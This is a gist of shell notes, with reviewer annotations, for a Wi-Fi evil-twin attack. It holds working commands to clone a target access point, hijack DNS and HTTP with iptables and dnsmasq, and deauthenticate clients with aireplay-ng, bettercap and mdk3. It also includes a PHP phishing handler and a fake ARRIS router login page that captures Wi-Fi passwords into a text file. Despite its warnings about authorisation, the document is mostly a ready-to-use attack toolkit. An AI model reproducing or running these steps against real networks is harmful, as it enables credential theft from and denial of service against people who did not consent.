@vitouXY
Created March 8, 2021 17:44
Evil Twin | WPS-PBC

Evil Twin / WPS-PBC — notes for standing up a rogue AP with a captive-portal login page and a WPS push-button enrollee. Every step below transmits on, deauthenticates clients from, or impersonates a specific network: use it only against networks you own or are explicitly authorised to test, and set the regulatory domain (`iw reg set`, `wifi.region`, txpower) to the country you are actually operating in rather than whatever allows the highest power.

Interfaces

# List the kernel's network interfaces (each one is a symlink under
# /sys/class/net) and leave out the loopback device.
find /sys/class/net/ -type l ! -name lo -print

Variables

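# Physical wireless interface, and the name of the monitor-mode interface that
# the "Interface Modo Monitor" step creates on top of it.
IFACE=wlan0
IFACEM="${IFACE:?}mon"

# Query `iw dev <iface> info` once and parse the fields out of the captured
# output instead of running it four times.  Every value is empty when iw fails
# or the field is absent (e.g. there is no txpower line while the link is down).
IFACE_INFO="$(iw dev "${IFACE:?}" info)"
IFACE_MODE="$(printf '%s\n' "${IFACE_INFO}" | awk '/type/ {print $2}')"       # managed / monitor / ...
IFACE_PHY="$(printf '%s\n' "${IFACE_INFO}" | awk '/wiphy/ {print "phy"$2}')"  # e.g. phy0
IFACE_TX="$(printf '%s\n' "${IFACE_INFO}" | awk '/txpower/ {print $2}')"      # number before "dBm"
IFACE_MAC="$(printf '%s\n' "${IFACE_INFO}" | awk '/addr/ {print $2}')"

# Target access point — placeholders to be filled in from the scan step.
TARGET_ESSID='Home WaiFai'
TARGET_BSSID='A1:B2:C3:D4:E5:F6'
TARGET_CHANNEL='5'
# Only used by the single-client deauth variant.
# NOTE(review): placeholder is identical to TARGET_BSSID; set it to a real station MAC.
TARGET_CLIENT='A1:B2:C3:D4:E5:F6'
# First three octets of the /24 the rogue AP hands out; .1 is the AP itself.
IFACE_IPADDR='192.168.0'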

Interface Modo Monitor — create the monitor-mode interface

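# Add a separate monitor-mode interface (${IFACE}mon) on the same radio.
rfkill unblock wifi
ip link set dev "${IFACE:?}" down
# Regulatory domain.  "US" is picked here for its permitted TX power; use the
# domain of the country you are actually in (the original noted "BO").
iw reg set US # BO
##iw ${IFACE:?} set txpower fixed 3000
##iwconfig ${IFACE:?} txpower 30
#iw ${IFACE:?} set monitor control
#airmon-ng check
#airmon-ng check kill
#airmon-ng start ${IFACE:?}
# IFACE_PHY comes from the Variables step; the new vif gets the IFACEM name.
iw phy "${IFACE_PHY:?}" interface add "${IFACE:?}mon" type monitor
ip link set dev "${IFACE:?}" up
# Bug fix: the original only brought ${IFACE} back up and left the freshly
# created monitor interface DOWN, so it was unusable until some later tool
# happened to bring it up itself.
ip link set dev "${IFACE:?}mon" up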

Interface Modo Managed — put the interface back in managed mode

# Return the physical interface to managed (station) mode; this is the mode
# the hostapd and wpa_supplicant steps below expect on ${IFACE}.
rfkill unblock wifi
ip link set dev ${IFACE:?} down
# Regulatory domain — use the country you are actually operating in (original noted "BO").
iw reg set US # BO
iwconfig ${IFACE:?} mode managed
# Alternatives kept from the original notes:
#iwconfig ${IFACE:?} mode ad-hoc
#iwconfig ${IFACE:?} channel 3
#iw set ${IFACE:?} type monitor # untested in the original
ip link set dev ${IFACE:?} up

Eliminar Interface — delete an interface

# Remove an interface from the driver.
rfkill unblock wifi
ip link set dev ${IFACE:?} down
# NOTE(review): this deletes the physical interface ${IFACE} itself.  To tear
# down only the monitor vif created in the "Modo Monitor" step, pass
# ${IFACEM:?} here instead.
iw dev ${IFACE:?} del

Escanear/Buscar Redes — scan for networks

  • Option 1
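# bettercap recon on the monitor interface: show the 13 strongest APs above
# -70 dBm, sorted by RSSI, redrawn every second.
# Bug fix: the original command ended in a stray ")" after the closing quote,
# which bash rejects as a syntax error.  wifi.region / wifi.txpower are
# regulatory settings — match them to where you actually are.
bettercap -iface "${IFACEM:?}" -eval 'wifi.recon on;wifi.region US;wifi.txpower 30;set wifi.show.limit 13;set wifi.rssi.min -70;set wifi.show.sort rssi asc;set wifi.show.manufacturer true;set ticker.period 1;set ticker.commands "clear;wifi.show";ticker on'
 # minimal form: -eval 'wifi.recon on;wifi.show'
 ## wifi.show.sort keys: rssi, bssid, essid, channel, encryption, clients, seen, sent, rcvd # desc|asc
 # wifi.interface ${IFACEM:?}
 # set wifi.show.filter ^XX:XX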
  • Option 2
# Scan with airodump-ng on the monitor interface, listing WPA networks only.
airodump-ng --encrypt WPA ${IFACEM:?}

Montar AP — bring up the rogue access point

# Clone the target's BSSID onto the physical interface (the link must be down
# while the MAC is changed).
ip link set dev ${IFACE:?} down
macchanger --mac=${TARGET_BSSID:?} ${IFACE:?}
# Alternative: a random MAC instead of the target's.
#macchanger -r ${IFACE:?}
ip link set dev ${IFACE:?} up
# OUI lookup (vendor name) for the target MAC.  The original had the two
# sources and the command collapsed onto a single comment line:
# http://standards-oui.ieee.org/oui.txt
# /usr/share/nmap/nmap-mac-prefixes
# cat oui.txt | grep -i "$(printf "${TARGET_BSSID:?}" | tr -d ':' | head -c 6)" | cut -d')' -f2 | tr -d '\t'
  • Option 1
# Software AP with airbase-ng on the monitor interface: open network using the
# target's ESSID on its channel.
airbase-ng -e "${TARGET_ESSID:?}" -c ${TARGET_CHANNEL:?} ${IFACEM:?}
# Variant: also spoof the target BSSID (-a) and set the WEP flag in beacons (-W 1).
#airbase-ng -c ${TARGET_CHANNEL:?} -a "${TARGET_BSSID:?}" -e "${TARGET_ESSID:?}" -W 1 ${IFACEM:?}
#sleep 2
# Variant: ESSID with a trailing space (so it differs from the real one) on channel 1;
# -L presumably selects airbase-ng's Caffe-Latte mode — check `airbase-ng --help`.
#airbase-ng -e "${TARGET_ESSID:?} " -c 1 -L -W 1 ${IFACEM:?} # with the trailing space
# -Z # 1=WEP40 2=TKIP 3=WRAP 4=CCMP 5=WEP104
  • Option 2
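# Write hostapd.conf with the shell variables expanded.  Bug fix: the original
# typed the file into an editor, which leaves the literal "${IFACE:?}" /
# "${TARGET_CHANNEL:?}" tokens in place — hostapd does not expand them.
cat > hostapd.conf <<EOF
interface=${IFACE:?}
channel=${TARGET_CHANNEL:?}
hw_mode=g
ssid=${TARGET_ESSID:?}
#bridge=br0
auth_algs=1
wmm_enabled=0
EOF
# Open network (no wpa= line).  Note this uses the managed-mode ${IFACE},
# not ${IFACEM}, unlike the airbase-ng option; hw_mode=g implies a 2.4 GHz channel.
hostapd -P hostapd.pid hostapd.conf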
  • Option 3
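# bettercap as the AP: open network (wifi.ap.encryption false) with the target's
# ESSID, BSSID and channel, recon kept on so joining clients are listed.
# Bug fix: the original referenced ${TARGET_BSSIDX:?} — a typo for TARGET_BSSID —
# so the :? guard aborted the command every time.
bettercap -iface "${IFACEM:?}" -eval "set wifi.ap.ssid '${TARGET_ESSID:?}';set wifi.ap.bssid ${TARGET_BSSID:?};set wifi.ap.channel ${TARGET_CHANNEL:?};set wifi.ap.encryption false;wifi.recon on; wifi.ap"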

Asignar Direcciones IP — address the AP interface, NAT, DHCP and DNS

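# Give the AP interface its address and redirect everything that arrives on it.
ip link set dev "${IFACE:?}" up
ip addr add "${IFACE_IPADDR:?}.1/24" broadcast "${IFACE_IPADDR:?}.255" dev "${IFACE:?}"
#          iptables ||  iptables-legacy
# modinfo nf_tables || modinfo ip_tables
# WARNING: this wipes every existing filter and nat rule on the host.
iptables --flush
iptables -t nat --flush
#iptables --table nat --append POSTROUTING --out-interface ${IFACE2:?} -j MASQUERADE
iptables --append FORWARD --in-interface "${IFACE:?}" -j ACCEPT
# Send client DNS and HTTP(S) to the local dnsmasq / php server.  Every rule is
# scoped with -i ${IFACE} on purpose.  Bug fix: the original also had an
# unscoped "-p tcp --dport 80" DNAT that matched port-80 traffic arriving on
# every interface (the host's uplink included) and, being first, made the
# scoped port-80 rule below it unreachable.
iptables -t nat -A PREROUTING -i "${IFACE:?}" -p udp -m udp --dport 53 -j DNAT --to-destination "${IFACE_IPADDR:?}.1:53"
iptables -t nat -A PREROUTING -i "${IFACE:?}" -p tcp -m tcp --dport 80 -j DNAT --to-destination "${IFACE_IPADDR:?}.1:80"
# 443 lands on the plain-HTTP server: nothing on this page starts a TLS
# listener, so HTTPS clients only get a handshake failure.
iptables -t nat -A PREROUTING -i "${IFACE:?}" -p tcp -m tcp --dport 443 -j DNAT --to-destination "${IFACE_IPADDR:?}.1:80"
iptables -t nat -A POSTROUTING -j MASQUERADE
sysctl net.ipv4.ip_forward=1 || echo 1 > /proc/sys/net/ipv4/ip_forward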
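# Write dnsmasq.conf with the variables expanded.  Bug fix: typing it into an
# editor leaves the literal "${IFACE_IPADDR:?}" tokens, which dnsmasq does not
# understand.  The original also set the router option twice (numeric 3 and
# option:router, same value); only one is kept.
cat > dnsmasq.conf <<EOF
interface=${IFACE:?}
#listen-address=127.0.0.1
listen-address=${IFACE_IPADDR:?}.1
#port=0
#bind-interfaces
dhcp-range=${IFACE_IPADDR:?}.10,${IFACE_IPADDR:?}.250,5m
dhcp-option=option:router,${IFACE_IPADDR:?}.1
dhcp-option=6,${IFACE_IPADDR:?}.1
server=8.8.8.8
log-queries
log-dhcp
no-hosts
dhcp-authoritative
# These two hosts resolve to the AP itself — presumably to catch Android's
# connectivity-check probes and trigger its sign-in prompt; confirm per OS.
address=/gstatic.com/${IFACE_IPADDR:?}.1
address=/connectivitycheck.android.com/${IFACE_IPADDR:?}.1
EOF
# Foreground (-d), logging to stderr; pid and lease files in the cwd.
dnsmasq -C dnsmasq.conf --log-facility=- -x dnsmasq.pid -l dnsmasq.leases -d # -k
#dnsspoof -i ${IFACE:?}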

Servir Sitio Web — serve the captive-portal site

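# Web root served by `php -S` below.  Write loading.html directly instead of
# opening an editor so the step is reproducible (mkdir -p: safe to re-run).
mkdir -p www.html
printf '%s\n' 'Loading, please wait ...' > www.html/loading.html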
nano www.html/post.php
<?php
// Form handler for index.html: send the client to the "loading" page and
// append every POSTed field to usernames.txt as "name=value" lines, with a
// blank line between submissions.  The file is opened relative to the
// server's working directory — with `php -S ... -t www.html/` that appears
// to be the document root (the setup step touches www.html/usernames.txt).
header ("Location:/loading.html");
// NOTE(review): fopen() is unchecked; if the file is missing or not writable,
// $handle is false and every fwrite() below warns and writes nothing.
$handle = fopen("usernames.txt", "a");
foreach($_POST as $variable => $value) {
 // Values are written raw: a value containing CR/LF breaks the
 // one-field-per-line format that `tail -f` is read with.
 fwrite($handle, $variable);
 fwrite($handle, "=");
 fwrite($handle, $value);
 fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
nano www.html/index.html
<!DOCTYPE html>
<html>
 <head>
  <!-- Minimal captive-portal page; the form posts to post.php.
       NOTE(review): the <title> reads as "Sign in" with a file path
       ("www.html/index.html") pasted into the middle of it. -->
  <title>Sign www.html/index.htmlin</title>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width,
  initial-scale=0.75, maximum-scale=0.75, user-scalable=no">
 </head>
 <body>
  <!-- Spanish: "Press the WPS button on your router or enter the password." -->
  <p> Pulse el boton WPS en su Router o ingrese contrasena.</p>
  <form method="post" action="post.php">
   <!-- <input type="text" name="email" placeholder="Email" required> -->
   <input type="password" name="password" placeholder="Password" required>
   <button type="submit" name="submit">Sign in</button>
  </form>
 </body>
</html>
# The capture file must exist before post.php appends to it.
touch www.html/usernames.txt
# PHP's built-in server on the AP address, port 80 (a privileged port, so this
# needs root or CAP_NET_BIND_SERVICE).  It runs in the foreground, so the
# `tail -f` below has to be started from another terminal.
# NOTE(review): `php -S -t www.html/` serves every file under that directory,
# including usernames.txt, to any client that joins the network.
php -S ${IFACE_IPADDR:?}.1:80 -t www.html/
tail -f www.html/usernames.txt

Desautenticar Clientes — deauthenticate clients from the target AP

  • Option 1
# Deauthenticate every station on the target AP (--deauth 0 = keep sending
# indefinitely); --ignore-negative-one skips aireplay-ng's channel "-1" check.
# This is an active denial of service against third-party devices — only
# against an AP you are authorised to test.
aireplay-ng --ignore-negative-one --deauth 0 -a ${TARGET_BSSID:?} ${IFACEM:?}
# Single station only (-c TARGET_CLIENT):
#aireplay-ng --ignore-negative-one --deauth 0 -a ${TARGET_BSSID:?} -c ${TARGET_CLIENT:?} ${IFACEM:?}
  • Option 2
# One-shot deauth of the target BSSID with bettercap.
bettercap -iface ${IFACEM:?} -eval "wifi.deauth ${TARGET_BSSID:?}"
# Repeating variant: re-send every 3 seconds via the ticker module.
#bettercap -iface ${IFACEM:?} -eval "set ticker.period 3;set ticker.commands 'wifi.deauth ${TARGET_BSSID:?}';ticker on"
  • Option 3
# mdk3 deauth mode (-d) on the target's channel; see `mdk3 --help d` for -g / -t.
mdk3 ${IFACEM:?} -d -g -t ${TARGET_BSSID:?} -c ${TARGET_CHANNEL:?}

WPS-PBC - wpa_supplicant (push-button enrollee)

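# Stop DHCP clients so they do not fight over ${IFACE} while wpa_supplicant uses it.
killall dhclient dhcpcd
# Minimal config: a control socket for wpa_cli, and update_config=1 so that a
# successful WPS exchange is written back into this file (that is what the
# `cat wpa_supplicant.conf` in the next step relies on).
# Bug fix: the original typed this into an editor; writing it with a quoted
# heredoc makes the step reproducible and keeps the text literal.
cat > wpa_supplicant.conf <<'EOF'
ctrl_interface=/var/run/wpa_supplicant
ctrl_interface_group=root
update_config=1
EOF
# Runs in the foreground — issue the wpa_cli command from another terminal.
wpa_supplicant -c wpa_supplicant.conf -i "${IFACE:?}"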

WPS-PBC - Wait for the AP's push-button window

# Start a WPS push-button enrollee against any AP in range.  It completes only
# if the AP's WPS button is pressed while the (~120 s) walk time is open; on
# success wpa_supplicant (update_config=1) writes the received network block
# into wpa_supplicant.conf, which the cat then shows.
wpa_cli -i ${IFACE:?} wps_pbc any # ~120sec
cat wpa_supplicant.conf

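# https://github.com/bettercap/bettercap/releases/
# Add the bettercap library directory to the loader path.
# Bug fix: the original used ${pwd} — an unset variable that expands to "" —
# instead of $PWD, and when LD_LIBRARY_PATH was unset it produced a leading ":".
# An empty path element is treated by the dynamic loader as the current
# directory, so any .so dropped into the cwd would be picked up by every
# program started from this shell.
export LD_LIBRARY_PATH="${LD_LIBRARY_PATH:+${LD_LIBRARY_PATH}:}/usr/local/lib:${PWD}/bettercaplib"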


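# Identify the USB adapter and check whether rt2800usb can find its firmware.
lsusb -v | grep 'id'
# idVendor           0x148f Ralink Technology, Corp.
# idProduct          0x3070 RT2870/RT3070 Wireless Adapte
modinfo rt2800usb | grep -E "filename|firmware"
ls -l /lib/firmware/rt2870.bin
# Preferred: install the distro's firmware package (linux-firmware /
# firmware-misc-nonfree or equivalent), which is signed and tracked by the
# package manager.
# https://git.kernel.org/pub/scm/linux/kernel/git/firmware/linux-firmware.git
# https://github.com/NXP/linux-firmware
# Fallback.  Bug fix: the original fetched the blob from a third-party mirror's
# moving "master" branch and moved it straight into /lib/firmware with no
# integrity check.  The kernel hands this file to the device, so treat it as
# privileged code: pin the URL to a commit rather than master, and refuse to
# install unless the digest matches one taken from linux-firmware.git.
if [ -n "${RT2870_SHA256:-}" ]; then
  curl -fsSL https://github.com/NXP/linux-firmware/raw/master/rt2870.bin -o rt2870.bin \
    && printf '%s  rt2870.bin\n' "${RT2870_SHA256}" | sha256sum -c - \
    && install -o root -g root -m 0644 rt2870.bin /lib/firmware/rt2870.bin
else
  printf 'RT2870_SHA256 is not set: refusing to install an unverified firmware blob\n' >&2
fi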


nano index.html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <!-- Router-style login page posted to post.php; the sidebar links all go
        to the one-second-refresh stub pages defined further down.  Branding
        strings in the footer are copied from router firmware (see the
        copyright lines); no asset other than /static.png is referenced. -->
   <title>Login</title>

    <meta charset='UTF-8'>
    <meta http-equiv="cache-control" content="no-cache" />
    <meta http-equiv="expires" content="0" />
    <meta http-equiv="pragma" content="no-cache" />

    <meta name="google" value="notranslate">
    <!-- NOTE(review): window.clipboardData exists only in old Internet Explorer;
         elsewhere the first timer() call throws and the timer never re-arms.
         Also "TimeID" is declared but the assignment targets "timeID" (case
         mismatch), so it silently creates a global. -->
    <script language="Javascript"> var TimeID; function timer() { window.clipboardData.clearData(); timeID = setTimeout('timer()', 100); } </script>
    <style type="text/css">
	TABLE { width:1200px }
	a { font-size:18px; text-decoration:none; font-weight:bold; }
	#bg-ffcolor { background-color:#FFFFFF; }
	#bg-tcolor { background-color:#FBFCFC; }
	#bg-color { background-color:#FDFFFF; }
	/**/
	#bg-bcolor { background-color:#9E1B32; }
	#bg-fcolor { background-color:#191970; }
	#ft-fcolor { color:#191970; }
    </style>
</head>
<!-- Context menu, drag and text selection are disabled on the body. -->
<body onload="timer()" oncontextmenu="return false" ondragstart="return false" onselectstart="return false">

<TABLE id="bg-color" style="height:800px;position:absolute;top:0;bottom:0;left:0;right:0;">
<TR id="bg-bcolor" style="height:20px"><TD></TD></TR>
<TR id="bg-fcolor" style="height:10px"><TD></TD></TR>
<TR id="bg-ffcolor"  style="height:100px">
	<TD>
	<TABLE CELLPADDING=0 CELLSPACING=10 style="height:100px">
	<TR VALIGN=bottom>
	<TD VALIGN=MIDDLE ALIGN=CENTER style="height:100px;height:50%"><img style="height:95px" src="/static.png" alt="LOGO"/></TD>
	<TD style="height:100px;width:600px"></TD>
		<TD>
		<TABLE style="height:100%;width:300px;">
		<TR></TR>
		<TR></TR>
		<TR></TR>
		<TR>
	<TD VALIGN=MIDDLE ALIGN=CENTER id="bg-fcolor" style="width:100px;"><a style="color:#FFFFFF;" href="/index.html">Home</a></TD>
	<TD VALIGN=MIDDLE ALIGN=CENTER id="bg-fcolor" style="whidth:100px;"><a style="color:#FFFFFF;" href="/">Login</a></TD><!-- NOTE(review): "whidth" typo; the width rule is ignored -->
	<TD style="width:100px;"></TD>
		</TR>
		</TABLE>
		</TD>
	</TR>
	</TABLE>
	</TD>
</TR>
<TR>
	<TD>
	<TABLE style="height:100%;width:100%">
	<TR style="width:100%;">
	<TD id="bg-ffcolor" style="width:15%;">
		<!-- Sidebar: every target is one of the redirect stubs (setup.html etc.). -->
		<TABLE CELLPADDING=0 CELLSPACING=10 style="height:100%;width:100%;">
		<TR style="height:8%;"><TD></TD></TR>
		<TR ALIGN=CENTER style="height:8%;"><TD id="bg-fcolor"><a style="color:#FFFFFF;" href="/setup.html">Wireless Setup</a></TD></TR>
		<TR ALIGN=CENTER style="height:8%;"><TD id="bg-fcolor"><a style="color:#FFFFFF;" href="/utils.html">Utilities</a></TD></TR>
		<TR ALIGN=CENTER style="height:5%;"><TD><a style="color:#000000;" href="/restart.html">Restart Router</a></TD></TR>
		<TR ALIGN=CENTER style="height:5%;"><TD><a style="color:#000000;" href="/wipe.html">Restore Factory</a></TD></TR>
		<TR ALIGN=CENTER style="height:5%;"><TD><a style="color:#000000;" href="/backup.html#Default">Default</a></TD></TR>
		<TR ALIGN=CENTER style="height:5%;"><TD><a style="color:#000000;" href="/backup.html#Save">Save/Backup Settings</a></TD></TR>
		<TR ALIGN=CENTER style="height:5%;"><TD><a style="color:#000000;" href="/backup.html#Restore">Restore Previus</a></TD></TR>
		<TR ALIGN=CENTER style="height:5%;"><TD><a style="color:#000000;" href="/settings.html">Settings</a></TD></TR>
		<TR ALIGN=CENTER style="height:5%;"><TD><a style="color:#000000;" href="/settings.html#Sys">System Settings</a></TD></TR>
		<TR><TD></TD></TR>
		</TABLE>
	</TD>
	<TD ALIGN=CENTER VALIGN=top id="ft-fcolor" style="width:10%;font-weight:900;font-size:28px;">Login</TD>
	<TD style="width:75%;">
		<TABLE style="height:100%;width:100%">
		<TR style="height:10%;"><TD></TD></TR>
		<TR>
		<TD COLSPAN=3 VALIGN=top id="bg-tcolor" style="height:20%;width:80%;">
<p style="font-weight:900;font-family:'Courier New'">To start or continue configuring the Router Modem, log in with a password. If you have not set up a password, leave this field blank and click 'Submit'.</p>
<p>   ** Password is required!</p>
		</TD>
		<TD></TD>
		</TR>
		<!-- A <form> directly inside a <table> is invalid markup; browsers tolerate it. -->
		<form method="post" action="post.php">
		<TR style="height:10%;">
		<TD ALIGN=CENTER style="width:40%"><strong>Password</strong></TD>
		<TD ALIGN=LEFT><input type="password" name="password" placeholder="Password" autocorrect="off" autocomplete="off" autocapitalize="off" required></TD>
		</TR>
		<TR VALIGN=top>
		<TD ALIGN=RIGHT><button type="submit" name="submit">Submit</button></TD>
		</TR>
		</TABLE>
	</TD>
	</TR>
	</TABLE>
<center><p style="font-size:11px;">Firmware TS0705125C_012814 eSAFE 0 FW Revision 2.0.69_063C</p></center>
<center><p style="font-size:11px;">©2014 ARRIS Group. Inc. ALL RIGHTS RESERVED.</p></center>
<!--
<center><p style="font-size:11px;">Copyright © Huawei Technologies Co. Ltd. 2009-2014. All Rights Reserved.</p></center>
-->
	</TD>
</TR>
</TABLE>



</body>
</html>
nano backup.html settings.html utils.html restart.html setup.html wipe.html
<!DOCTYPE html>
<html>
<!-- One stub written to every sidebar target (backup/settings/utils/restart/
     setup/wipe.html): show a failure line and bounce back to the login page
     after one second.  NOTE(review): the first paragraph is never closed
     ("<p>...<p>"). -->
<head><meta http-equiv="refresh" content="1; url=/index.html"></head>
<body><p>TSK637::Pending Task.<p>
<p>AUTH:Failed - <a href="/index.html">Redirection</a></p></body>
</html>